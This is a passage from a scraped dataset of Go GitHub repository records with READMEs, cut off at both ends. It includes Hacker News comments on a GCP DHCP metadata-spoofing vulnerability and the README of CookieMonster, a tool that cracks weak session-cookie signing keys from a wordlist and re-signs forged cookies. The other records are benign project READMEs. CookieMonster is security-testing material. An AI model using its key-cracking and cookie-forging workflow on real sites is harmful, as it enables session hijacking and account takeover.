been communicated, or some other change in GCE has closed it or mitigated it?While it certainly seems like a fairly serious vulnerability I think it's worth highlighting that this attack requires that either you already have access to a machine on the same subnet as the target machine or that the firewall in front of the target machine is very lax. That's a pretty high bar for getting the attack to work in the wild.Same subnet = as another VM in your project? or random GCP VM that happens to share your subnet? Seems like pretty different risk levels...https://github.com/irsl/gcp-dhcp-takeover-code-exec#attack-s...testVery creative approach, never thought of such an attack vector.This attack allows an adversary to move from root permissions on one VM in a GCP project to gaining root permissions on another VM in the same project.The attack is unlikely to succeed unless the attacker knows the exact time a particular VM was last rebooted, or can cause a reboot.Overall, this attack alone probably won't be the reason you will have to start filling in a GDPR notification to your users...Apparently Google Project Zero timeline only applies to others...> any security-conscious GCP customersDoes that exist? In my book, if you're security conscious, you can only do self-hosting whether on premises or in your own bay in a datacenter.Giving away your entire computing and networking to a third party such as Google is orthogonal to security.While there are a series of vulnerabilities here, none of them would be exploitable in this way if the metadata server was accessed via an IP instead of the hostname metadata.google.internal.The metadata server is documented to be at 169.254.169.25, always[1]. But Google software (agents and libraries on VMs) resolves it by looking up metadata.google.internal. If metadata.google.internal isn't in /etc/hosts, as can be the case in containers, this can result in actual DNS lookups over the network to get an address that should be known.AWS uses the same address for their metadata server, but accesses via the IP address and not some hostname[2].I've seen Google managed DNS servers (in GKE clusters) fall over under the load of Google libraries querying for the metadata address[3]. I'm guessing Google wants to maintain some flexibility, which is why they are using a hostname, but there are tradeoffs.[1] https://cloud.google.com/compute/docs/internal-dns[2] https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance...[3] This is easily solvable with Kubernetes HostAliases that write /etc/hosts in the containers.Why the hell isn't the metadata server authenticated, e.g. via TLS certificates?So why isn't the metadata server authenticated?It would seem simple enough for googles metadata server to have a valid HTTPS certificate and be hosted on a non-internal domain. Or use an internal domain, but make pre-built images use a custom CA.Or Google could make a 'trusted network device', rather like a VPN, which routes traffic for 169.254.169.254 (the metadata server IP address) and add metadata.google.internal to the hosts file as 169.254.169.254.The combination of dhcp, magic metadata servers, and cloud-init feels so awkward way of managing VM provisioning. I'm thinking would having a proper virtual device or maybe something on uefi layer clean up things?There's a really simple (albeit hacky) workaround which can be deployed fairly quickly. In /etc/dhcp/dhclient-exit-hooks.d/google_set_hostname replace this line:if [ -n \"$new_host_name\" ] && [ -n \"$new_ip_address\" ]; thenwith this:if [ -n \"$new_host_name\" -a ! \"$new_host_name\" =~ metadata.google.internal ] && [ -n \"$new_ip_address\" ]; then(Yes, =~ is a bashism, but google_set_hostname is a bash script.)This prevents /etc/hosts from getting poisoned with a bogus entry for the metadata server. Of course, dhcpd should also be fixed to use a better random number generator, and the firewall should be default stop dhcp packets from any IP address other than Google's DHCP server. Belt and suspenders, after all. But fixing the dhclient exit hooks is a simple text edit.The more concerning security finding here is that Google sat on this for 9 months. Assuming the claims hold, this is a serious problem for any security-conscious GCP customers. What other vulnerabilities are they sitting on? Do they have processes in place to promptly handle new ones? Doesn\u2019t look like it\u2026", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "iangcarroll/cookiemonster", "link": "https://github.com/iangcarroll/cookiemonster", "tags": [], "stars": 519, "description": "\ud83c\udf6a CookieMonster helps you detect and abuse vulnerable implementations of stateless sessions.", "lang": "Go", "repo_lang": "", "readme": "# :cookie: CookieMonster\nCookieMonster is a command-line tool and API for decoding and modifying vulnerable session cookies from several different frameworks. It is designed to run in automation pipelines which must be able to efficiently process a large amount of these cookies to quickly discover vulnerabilities. Additionally, CookieMonster is extensible and can easily support new cookie formats.\n\nIt's worth emphasizing that CookieMonster finds vulnerabilities in users of frameworks, usually not in the frameworks themselves. These users can resolve vulnerabilities found via CookieMonster by configuring the framework to use a strong secret key.\n\n## Features\n* Decodes and unsigns session cookies from Laravel, Django, Flask, Rack, and Express, and also handles raw JWTs.\n* Rapidly evaluates cookies; ignores invalid and unsupported cookies, and quickly tests those that it can.\n* Takes full advantage of Go's fast, native implementations for hash functions.\n* Intelligently decodes URL-encoded and Base64-encoded cookies (i.e. the Base64 of a JWT) when the initial decoding fails.\n* Supports many algorithms for HMAC-based decoders, even if the framework typically only uses one.\n* Flexible base64-encoded wordlist format allows any sequence of bytes key to be added as an entry; ships with a reasonable default list.\n\n| Framework | Supported | Notes |\n|-------------------------|-----------|----------------------------------------------------------|\n| JSON Web Tokens | \u2705 | HS256, HS384, HS512 |\n| Django | \u2705 | Common algorithms |\n| Flask | \u2705 | Common algorithms |\n| Rack | \u2705 | Common algorithms |\n| Express (cookie-signer) | \u2705 | Common algorithms |\n| Laravel | \u2705 | AES-CBC-128/256 (GCM not yet supported) |\n| itsdangerous | \u2705 | URLSafeSerializer/URLSafeTimedSerializer (default salt) |\n| Others | \u274c | Not yet! |\n\n## Getting Started\nTo install CookieMonster, install Go and then install the CLI:\n\n```bash\ngo install github.com/iangcarroll/cookiemonster/cmd/cookiemonster@latest\n```\n\nCookieMonster only needs two essentials: a cookie to try and unsign, and a wordlist to use. If you don't have a wordlist, CookieMonster ships with a default wordlist from the [Flask-Unsign](https://github.com/Paradoxis/Flask-Unsign) project. CookieMonster wordlists are a bit different; each line must be encoded with base64. This is because Python projects are especially liberal with inserting garbage bytes into these keys, and we need to be able to properly handle them.\n\nAn example of using the CLI with a static cookie, or with a URL:\n\n```bash\n% ./cookiemonster -cookie \"gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1mgnkC:z5yDxzI06qYVAU3bkLaWYpADT4I\"\n\ud83c\udf6a CookieMonster 1.3.0\n\u2139\ufe0f CookieMonster loaded the default wordlist; it has 38919 entries.\n\u2705 Success! I discovered the key for this cookie with the django decoder; it is \"changeme\".\n\n% ./cookiemonster -url \"https://httpbingo.org/cookies/set?abc=gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1mgnkC:z5yDxzI06qYVAU3bkLaWYpADT4I\"\n\ud83c\udf6a CookieMonster 1.3.0\n\u26a0\ufe0f I got a non-200 status code from this URL; it was 302.\n\u2139\ufe0f CookieMonster loaded the default wordlist; it has 38919 entries.\n\u2705 Success! I discovered the key for this cookie with the django decoder; it is \"changeme\".\n```\n\n## Express support\nCookieMonster is capable of supporting cookies signed with `cookie-session`, which is common with Express. However, it does several strange things that require care in order to use this tool. A common response from a `cookie-session` application looks like this:\n\n```http\nset-cookie: session=eyJhbmltYWxzIjoibGlvbiJ9\nset-cookie: session.sig=Vf2INocdJIqKWVfYGhXwPhQZNFI\n```\n\nIn order to pass this into CookieMonster, you must include both the cookie name and the signature cookie. In this example, you would call CookieMonster like this: `cookiemonster -cookie session=eyJhbmltYWxzIjoibGlvbiJ9^Vf2INocdJIqKWVfYGhXwPhQZNFI` (note the delimiting `^` and the prefixed cookie name). The API accepts this same format in `monster.NewCookie`.\n\n## Resigning support\nCookieMonster has limited support for resigning a cookie once it has been unsigned, with the `-resign` flag. This involves modifying the body of the cookie to match your input, and then re-computing the signature with the key we discovered. Currently, you can do this for Django-decoded cookies; ensure you pass the original cookie to `-cookie`, and pass `-resign` an unencoded string of text you'd like to be inside the cookie. CookieMonster will correctly encode your input and then resign the cookie.\n\n## API usage\nCookieMonster exposes `pkg/monster`, which allows other applications to easily take advantage of it. This is much more performant than booting the CLI if you are testing many cookies. An example usage of it is below.\n\n```go\nimport (\n \"github.com/iangcarroll/cookiemonster/pkg/monster\"\n)\n\nvar (\n\t//go:embed wordlists/my-wordlist.txt\n\tmonsterWordlist string\n\n\twl = monster.NewWordlist()\n)\n\nfunc init() {\n\tif err := wl.LoadFromString(monsterWordlist); err != nil {\n panic(err)\n }\n}\n\nfunc MonsterRun(cookie string) (success bool, err error) {\n\tc := monster.NewCookie(cookie)\n\n\tif !c.Decode() {\n\t\treturn false, errors.New(\"could not decode\")\n\t}\n\n\tif _, success := c.Unsign(wl, 100); !success {\n\t\treturn false, errors.New(\"could not unsign\")\n\t}\n\n\treturn true, nil\n}\n```\n\n\n## Credits\nCookieMonster is built with inspiration from several sources, and ships with the excellent Flask-Unsign wordlists.\n\n* https://github.com/Paradoxis/Flask-Unsign\n* https://github.com/nicksanders/rust-django-signing", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "shimberger/gohls", "link": "https://github.com/shimberger/gohls", "tags": ["hls", "ffmpeg", "golang", "react", "video-stream", "videojs", "hacktoberfest"], "stars": 519, "description": "A server that exposes a directory for video streaming via web interface", "lang": "Go", "repo_lang": "", "readme": "# Golang HLS Streamer\n\n[![CircleCI](https://circleci.com/gh/shimberger/gohls/tree/master.svg?style=svg)](https://circleci.com/gh/shimberger/gohls/tree/master) \n[![GoDoc](https://godoc.org/github.com/shimberger/gohls?status.svg)](https://godoc.org/github.com/shimberger/gohls) \n\nSimple server that exposes a directory for video streaming via HTTP Live Streaming (HLS). Uses ffmpeg for transcoding.\n\n*This project is cobbled together from all kinds of code I had lying around so it's pretty crappy all around. It also has some serious shortcomings.*\n\n## Running it\n\n*Important*: You need the ffmpeg and ffprobe binaries in your PATH. The server will not start without them. You can find builds most operating systems at [https://ffmpeg.org/download.html](https://ffmpeg.org/download.html).\n\n### 1. Download the binary for your operating system\n\nYou can find the latest release on the releases page [https://github.com/shimberger/gohls/releases](https://github.com/shimberger/gohls/releases) or just download a current snapshot:\n\n- [Windows (64 bit)](https://s3.amazonaws.com/gohls/gohls-windows-amd64-snapshot.tar.gz)\n- [Linux (64 bit)](https://s3.amazonaws.com/gohls/gohls-linux-amd64-snapshot.tar.gz)\n- [macOS (64 bit)](https://s3.amazonaws.com/gohls/gohls-osx-snapshot.tar.gz)\n\n### 2. Create a configuration file\n\nThe configuration is stored in JSON format. Just call the file `gohls-config.json` or whatever you like. The format is as follows:\n\n```\n{\n\t\"folders\": [\n\t\t{\n\t\t\t\"path\": \"~/Videos\",\n\t\t\t\"title\": \"My Videos\"\n\t\t},\n\t\t{\n\t\t\t\"path\": \"~/Downloads\",\n\t\t\t\"title\": \"My Downloads\"\n\t\t}\n\t]\n}\n```\n\nThis will configure which directories on your system will be made available for streaming. See the screenshot for details:\n\n![](https://s3-eu-west-1.amazonaws.com/captured-krxvuizy1557lsmzs8mvzdj4/yd4ei-20181024-24215053.png)\n\n### 3. Run the server\n\nExecute the command `gohls serve -config ` e.g. `gohls serve -config gohls-config.json` to serve the videos specified by the config file. To make the server listen on another port or address just use the `serve` command with `--listen` like so (the example uses port 7000 on all interfaces): `gohls serve --listen :7000 -config `\n\n### 4. Open a web browser\n\nVisit the URL [http://127.0.0.1:8080](http://127.0.0.1:8080) to access the web interface.\n\n## Contributing\n\n### Requirements\n\n- [go installed](https://golang.org/dl/)\n- [npm installed](https://nodejs.org/en/) *(NPM is part of Node.js)*\n- bash\n\n### Initial setup\n\n1. Clone the repository `git@github.com:shimberger/gohls.git`\n2. Build frontend `cd ui/ && npm install && npm run build && cd ..`\n\n### Running server\n\nTo then run the development server execute: `./scripts/run.sh serve`\n\n## License\n\nSee [LICENSE.txt](https://github.com/shimberger/gohls/blob/master/LICENSE.txt)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gravityblast/traffic", "link": "https://github.com/gravityblast/traffic", "tags": [], "stars": 519, "description": "Sinatra inspired regexp/pattern mux and web framework for Go [NOT MAINTAINED]", "lang": "Go", "repo_lang": "", "readme": "# Traffic\n\n[![Build Status](https://travis-ci.org/pilu/traffic.png?branch=master)](https://travis-ci.org/pilu/traffic)\n\nPackage traffic - a Sinatra inspired regexp/pattern mux for [Go](http://golang.org/ \"The Go programming language\").\n\n## Installation\n\n go get github.com/pilu/traffic\n\n## Features\n\n * [Regexp routing](https://github.com/pilu/traffic/blob/master/examples/simple/main.go)\n * [Before Filters](https://github.com/pilu/traffic/blob/master/examples/before-filter/main.go)\n * [Custom not found handler](https://github.com/pilu/traffic/blob/master/examples/not-found/main.go)\n * [Middlewares](https://github.com/pilu/traffic/blob/master/examples/middleware/main.go)\n * Examples: [Airbrake Middleware](https://github.com/pilu/traffic-airbrake), [Chrome Logger Middleware](https://github.com/pilu/traffic-chromelogger)\n * [Templates/Views](https://github.com/pilu/traffic/tree/master/examples/templates)\n * [Easy Configuration](https://github.com/pilu/traffic/tree/master/examples/configuration)\n\n## Development Features\n\n * [Shows errors and stacktrace in browser](https://github.com/pilu/traffic/tree/master/examples/show-errors)\n * [Serves static files](https://github.com/pilu/traffic/tree/master/examples/static-files)\n * Project Generator\n\n`development` is the default environment. The above middlewares are loaded only in `development`.\n\nIf you want to run your application in `production`, export `TRAFFIC_ENV` with `production` as value.\n\n```bash\nTRAFFIC_ENV=production your-executable-name\n```\n\n## Installation\n\nDowload the `Traffic` code:\n\n```bash\ngo get github.com/pilu/traffic\n```\n\nBuild the command line tool:\n\n```bash\ngo get github.com/pilu/traffic/traffic\n```\n\nCreate a new project:\n```bash\ntraffic new hello\n```\n\nRun your project:\n```bash\ncd hello\ngo build && ./hello\n```\n\nYou can use [Fresh](https://github.com/pilu/fresh) if you want to build and restart your application every time you create/modify/delete a file.\n\n## Example:\nThe following code is a simple example, the documentation in still in development.\nFor more examples check the `examples` folder.\n\n```go\npackage main\n\nimport (\n \"net/http\"\n \"github.com/pilu/traffic\"\n \"fmt\"\n)\n\nfunc rootHandler(w traffic.ResponseWriter, r *traffic.Request) {\n fmt.Fprint(w, \"Hello World\\n\")\n}\n\nfunc pageHandler(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n fmt.Fprintf(w, \"Category ID: %s\\n\", params.Get(\"category_id\"))\n fmt.Fprintf(w, \"Page ID: %s\\n\", params.Get(\"id\"))\n}\n\nfunc main() {\n router := traffic.New()\n\n // Routes\n router.Get(\"/\", rootHandler)\n router.Get(\"/categories/:category_id/pages/:id\", pageHandler)\n\n router.Run()\n}\n```\n\n## Before Filters\n\nYou can also add \"before filters\" to all your routes or just to some of them:\n\n```go\nrouter := traffic.New()\n\n// Executed before all handlers\nrouter.AddBeforeFilter(checkApiKey).\n AddBeforeFilter(addAppNameHeader).\n AddBeforeFilter(addTimeHeader)\n\n// Routes\nrouter.Get(\"/\", rootHandler)\nrouter.Get(\"/categories/:category_id/pages/:id\", pageHandler)\n\n// \"/private\" has one more before filter that checks for a second api key (private_api_key)\nrouter.Get(\"/private\", privatePageHandler).\n AddBeforeFilter(checkPrivatePageApiKey)\n```\n\nComplete example:\n\n```go\nfunc rootHandler(w traffic.ResponseWriter, r *traffic.Request) {\n fmt.Fprint(w, \"Hello World\\n\")\n}\n\nfunc privatePageHandler(w traffic.ResponseWriter, r *traffic.Request) {\n fmt.Fprint(w, \"Hello Private Page\\n\")\n}\n\nfunc pageHandler(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n fmt.Fprintf(w, \"Category ID: %s\\n\", params.Get(\"category_id\"))\n fmt.Fprintf(w, \"Page ID: %s\\n\", params.Get(\"id\"))\n}\n\nfunc checkApiKey(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n if params.Get(\"api_key\") != \"foo\" {\n w.WriteHeader(http.StatusUnauthorized)\n }\n}\n\nfunc checkPrivatePageApiKey(w traffic.ResponseWriter, r *traffic.Request) {\n params := r.URL.Query()\n if params.Get(\"private_api_key\") != \"bar\" {\n w.WriteHeader(http.StatusUnauthorized)\n }\n}\n\nfunc addAppNameHeader(w traffic.ResponseWriter, r *traffic.Request) {\n w.Header().Add(\"X-APP-NAME\", \"My App\")\n}\n\nfunc addTimeHeader(w traffic.ResponseWriter, r *traffic.Request) {\n t := fmt.Sprintf(\"%s\", time.Now())\n w.Header().Add(\"X-APP-TIME\", t)\n}\n\nfunc main() {\n router := traffic.New()\n\n // Routes\n router.Get(\"/\", rootHandler)\n router.Get(\"/categories/:category_id/pages/:id\", pageHandler)\n // \"/private\" has one more before filter that checks for a second api key (private_api_key)\n router.Get(\"/private\", privatePageHandler).\n AddBeforeFilter(checkPrivatePageApiKey)\n\n // Executed before all handlers\n router.AddBeforeFilter(checkApiKey).\n AddBeforeFilter(addAppNameHeader).\n AddBeforeFilter(addTimeHeader)\n\n router.Run()\n}\n```\n\n## Author\n\n* [Andrea Franz](http://gravityblast.com)\n\n## More\n\n* Code: \n* Mailing List: \n* Chat: \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "howtowhale/dvm", "link": "https://github.com/howtowhale/dvm", "tags": ["docker"], "stars": 519, "description": "Docker Version Manager", "lang": "Go", "repo_lang": "", "readme": "# Docker Version Manager\n\n

howtowhale.github.io/dvm/

\n\n![dvm-usage](https://cloud.githubusercontent.com/assets/1368985/10800443/d3f0f39a-7d7f-11e5-87b5-1bda5ffe4859.png)\n\nVersion management for your Docker client. Escape from this error for a little bit longer:\n\n```\nError response from daemon: client and server don't have same version (client : 1.18, server: 1.16)\n```\n\n# Contributing\nSee our [Contributing Guide](CONTRIBUTING.md).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zentures/sequence", "link": "https://github.com/zentures/sequence", "tags": [], "stars": 519, "description": "(Unmaintained) High performance sequential log analyzer and parser", "lang": "Go", "repo_lang": "", "readme": "sequence\n========\n\n**`sequence` is currently iced since I don't have time to continue, and should be considered unstable until further notice. If anyone's interested in continue development of this, I would be happy to add you to the project.**\n\n[sequencer.io](http://sequencer.io)\n\n[![GoDoc](http://godoc.org/github.com/surge/sequence?status.svg)](http://godoc.org/github.com/surge/sequence) \n\n[![GoDoc](http://godoc.org/github.com/surge/sequence/cmd/sequence?status.svg)](http://godoc.org/github.com/surge/sequence/cmd/sequence)\n\n\n`sequence` is a _high performance sequential log scanner, analyzer and parser_. It _sequentially_ goes through a log message, _parses_ out the meaningful parts, without the use regular expressions. It can achieve _high performance_ parsing of **100,000 - 200,000 messages per second (MPS)** without the need to separate parsing rules by log source type.\n\n**If you have a set of logs you would like me to test out, please feel free to [open an issue](https://github.com/surge/sequence/issues) and we can arrange a way for me to download and test your logs.**\n\n### Motivation\n\nLog messages are notoriusly difficult to parse because they all have different formats. Industries (see Splunk, ArcSight, Tibco LogLogic, Sumo Logic, Logentries, Loggly, LogRhythm, etc etc etc) have been built to solve the problems of parsing, understanding and analyzing log messages.\n\nLet's say you have a bunch of log files you like to parse. The first problem you will typically run into is you have no way of telling how many DIFFERENT types of messages there are, so you have no idea how much work there will be to develop rules to parse all the messages. Not only that, you have hundreds of thousands, if not millions of messages, in front of you, and you have no idea what messages are worth parsing, and what's not.\n\nThe typical workflow is develop a set of regular expressions and keeps testing against the logs until some magical moment where all the logs you want parsed are parsed. Ask anyone who does this for a living and they will tell you this process is long, frustrating and error-prone.\n\nEven after you have developed a set of regular expressions that match the original set of messages, if new messages come in, you will have to determine which of the new messages need to be parsed. And if you develop a new set of regular expressions to parse those new messages, you still have no idea if the regular expressions will conflict with the ones you wrote before. If you write your regex parsers too liberally, it can easily parse the wrong messages.\n\nAfter all that, you will end up finding out the regex parsers are quite slow. It can typically parse several thousands messages per second. Given enough CPU resources on a large enough machine, regex parsers can probably parse tens of thousands of messages per second. Even to achieve this type of performance, you will likely need to limit the number of regular expressions the parser has. The more regex rules, the slower the parser will go.\n\nTo work around this performance issue, companies have tried to separate the regex rules for different log message types into different parsers. For example, they will have a parser for Cisco ASA logs, a parser for sshd logs, a parser for Apache logs, etc etc. And then they will require the users to tell them which parser to use (usually by indicating the log source type of the originating IP address or host.)\n\nSequence is developed to make analyzing and parsing log messages a lot easier and faster.\n\n### Performance\n\nThe following performance benchmarks are run on a single 4-core (2.8Ghz i7) MacBook Pro, although the tests were only using 1 or 2 cores. The first file is a bunch of sshd logs, averaging 98 bytes per message. The second is a Cisco ASA log file, averaging 180 bytes per message. Last is a mix of ASA, sshd and sudo logs, averaging 136 bytes per message.\n\n```\n $ ./sequence bench scan -i ../../data/sshd.all\n Scanned 212897 messages in 0.78 secs, ~ 272869.35 msgs/sec\n\n $ ./sequence bench parse -p ../../patterns/sshd.txt -i ../../data/sshd.all\n Parsed 212897 messages in 1.69 secs, ~ 126319.27 msgs/sec\n\n $ ./sequence bench parse -p ../../patterns/asa.txt -i ../../data/allasa.log\n Parsed 234815 messages in 2.89 secs, ~ 81323.41 msgs/sec\n\n $ ./sequence bench parse -d ../patterns -i ../data/asasshsudo.log\n Parsed 447745 messages in 4.47 secs, ~ 100159.65 msgs/sec\n```\n\nPerformance can be improved by adding more cores:\n\n\n```\n $ GOMAXPROCS=2 ./sequence bench scan -i ../../data/sshd.all -w 2\n Scanned 212897 messages in 0.43 secs, ~ 496961.52 msgs/sec\n\n GOMAXPROCS=2 ./sequence bench parse -p ../../patterns/sshd.txt -i ../../data/sshd.all -w 2\n Parsed 212897 messages in 1.00 secs, ~ 212711.83 msgs/sec\n\n $ GOMAXPROCS=2 ./sequence bench parse -p ../../patterns/asa.txt -i ../../data/allasa.log -w 2\n Parsed 234815 messages in 1.56 secs, ~ 150769.68 msgs/sec\n\n $ GOMAXPROCS=2 ./sequence bench parse -d ../patterns -i ../data/asasshsudo.log -w 2\n Parsed 447745 messages in 2.52 secs, ~ 177875.94 msgs/sec\n```\n\n### Limitations\n\n* `sequence` does not handle multi-line logs. Each log message must appear as a single line. So if there's multi-line logs, they must first be converted into a single line.\n* `sequence` has only been tested with a limited set of system (Linux, AIX, sudo, ssh, su, dhcp, etc etc), network (ASA, PIX, Neoteris, CheckPoint, Juniper Firewall) and infrastructure application (apache, bluecoat, etc) logs. If you have a set of logs you would like me to test out, please feel free to [open an issue](https://github.com/strace/sequence/issues) and we can arrange a way for me to download and test your logs.\n\n### Usage\n\nTo run the unit tests, you need to be in the top level sequence dir:\n\n```\ngo get github.com/strace/sequence\ncd $GOPATH/src/github.com/strace/sequence\ngo test\n```\n\nTo run the actual command you need to\n\n```\ncd $GOPATH/src/github.com/strace/sequence/cmd/sequence\ngo run sequence.go\n```\n\nDocumentation is available at [sequencer.io](http://sequencer.io).\n\n### License\n\nCopyright (c) 2014 Dataence, LLC. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yorkie-team/yorkie", "link": "https://github.com/yorkie-team/yorkie", "tags": ["yorkie", "collaborative-applications", "crdt", "grpc", "realtime-collaboration", "hacktoberfest", "go"], "stars": 519, "description": "Yorkie is a document store for collaborative applications.", "lang": "Go", "repo_lang": "", "readme": "# Yorkie\n\n[![GitHub](https://img.shields.io/github/stars/yorkie-team/yorkie.svg?style=social)](https://github.com/yorkie-team/yorkie)\n[![Twitter](https://img.shields.io/twitter/follow/team_yorkie.svg?label=Follow)](https://twitter.com/team_yorkie)\n[![Discord](https://img.shields.io/discord/928301813785038878?label=discord&logo=discord&logoColor=white)](https://discord.gg/MVEAwz9sBy)\n[![Contributors](https://img.shields.io/github/contributors/yorkie-team/yorkie.svg)](https://github.com/yorkie-team/yorkie/contributors)\n[![Commits](https://img.shields.io/github/commit-activity/m/yorkie-team/yorkie.svg)](https://github.com/yorkie-team/yorkie/pulse)\n\n[![Build Status](https://github.com/yorkie-team/yorkie/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/yorkie-team/yorkie/actions/workflows/ci.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/yorkie-team/yorkie)](https://goreportcard.com/report/github.com/yorkie-team/yorkie)\n[![CodeCov](https://img.shields.io/codecov/c/github/yorkie-team/yorkie)](https://codecov.io/gh/yorkie-team/yorkie)\n[![Godoc](http://img.shields.io/badge/go-documentation-blue.svg?style=flat-square)](https://godoc.org/github.com/yorkie-team/yorkie)\n\nYorkie is an open source document store for building collaborative editing applications. Yorkie uses JSON-like documents(CRDT) with optional types.\n\nYorkie consists of three main components: Client, Document and Server.\n\n ```\n Client \"A\" (Go) Server MemDB or MongoDB\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502 Document \"D-1\" \u2502\u25c4\u2500Changes\u2500\u25ba\u2502 Project \"P-1\" \u2502 \u2502 Changes \u2502\n\u2502 { a: 1, b: {} } \u2502 \u2502 \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u25c4\u2500\u25ba\u2502 Snapshots \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2502 Document \"D-1\" \u2502 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n Client \"B\" (JS) \u2502 \u2502 { a: 2, b: {} } \u2502 \u2502\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502 \u2502 \u2502 \u2502\n\u2502 Document \"D-1\" \u2502\u25c4\u2500Changes\u2500\u25ba\u2502 \u2502 Document \"D-2\" \u2502 \u2502\n\u2502 { a: 2, b: {} } \u2502 \u2502 \u2502 { a: 3, b: {} } \u2502 \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2502\n Admin (CLI, Web) \u2502 \u2502\n\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\u2502 Query \"Q-1\" \u2502 \u25b2\n\u2502 P-1.find({a:2}) \u251c\u2500\u2500\u2500\u2500\u2500 Query\u2500\u2500\u2500\u2518\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n ```\n\n- Clients can have a replica of the document representing an application model locally on several devices.\n- Each client can independently update the document on their local device, even while offline.\n- When a network connection is available, the client figures out which changes need to be synced from one device to another, and brings them into the same state.\n- If the document was changed concurrently on different devices, Yorkie automatically syncs the changes, so that every replica ends up in the same state with resolving conflict.\n\n## SDKs\n\nYorkie provides SDKs for Go, JavaScript, iOS, and Android:\n\n- [Go SDK](https://github.com/yorkie-team/yorkie)\n - Client: https://github.com/yorkie-team/yorkie/tree/main/client\n - Document: https://github.com/yorkie-team/yorkie/tree/main/pkg/document\n- [JS SDK](https://github.com/yorkie-team/yorkie-js-sdk)\n- [iOS SDK](https://github.com/yorkie-team/yorkie-ios-sdk)\n- [Android SDK](https://github.com/yorkie-team/yorkie-android-sdk)\n- [Dashboard](https://github.com/yorkie-team/dashboard)\n\n## Documentation\n\nFull, comprehensive [documentation](https://yorkie.dev/docs) is available on the Yorkie website.\n\n### Getting Started\n\n- [with JS SDK](https://yorkie.dev/docs/getting-started/with-js-sdk)\n- [with iOS SDK](https://yorkie.dev/docs/getting-started/with-ios-sdk)\n- [with Android SDK](https://yorkie.dev/docs/getting-started/with-android-sdk)\n\n## Contributing\n\nSee [CONTRIBUTING](CONTRIBUTING.md) for details on submitting patches and the contribution workflow.\n\n## Contributors \u2728\n\nThanks go to these incredible people:\n\n\n \"contributors\"/\n\n\n## Sponsors\n\nIs your company using Yorkie? Ask your boss to support us. It will help us dedicate more time to maintain this project and to make it even better for all our users. Also, your company logo will show up on here and on our website: -) [[Become a sponsor](https://opencollective.com/yorkie#sponsor)]\n\n\n### Backers\n\nPlease be our [Backers](https://opencollective.com/yorkie#backers).\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "djherbis/buffer", "link": "https://github.com/djherbis/buffer", "tags": [], "stars": 518, "description": "Composable Buffers for Go #golang", "lang": "Go", "repo_lang": "", "readme": "Buffer \n==========\n\n[![GoDoc](https://godoc.org/github.com/djherbis/buffer?status.svg)](https://godoc.org/github.com/djherbis/buffer)\n[![Release](https://img.shields.io/github/release/djherbis/buffer.svg)](https://github.com/djherbis/buffer/releases/latest)\n[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg)](LICENSE.txt)\n[![go 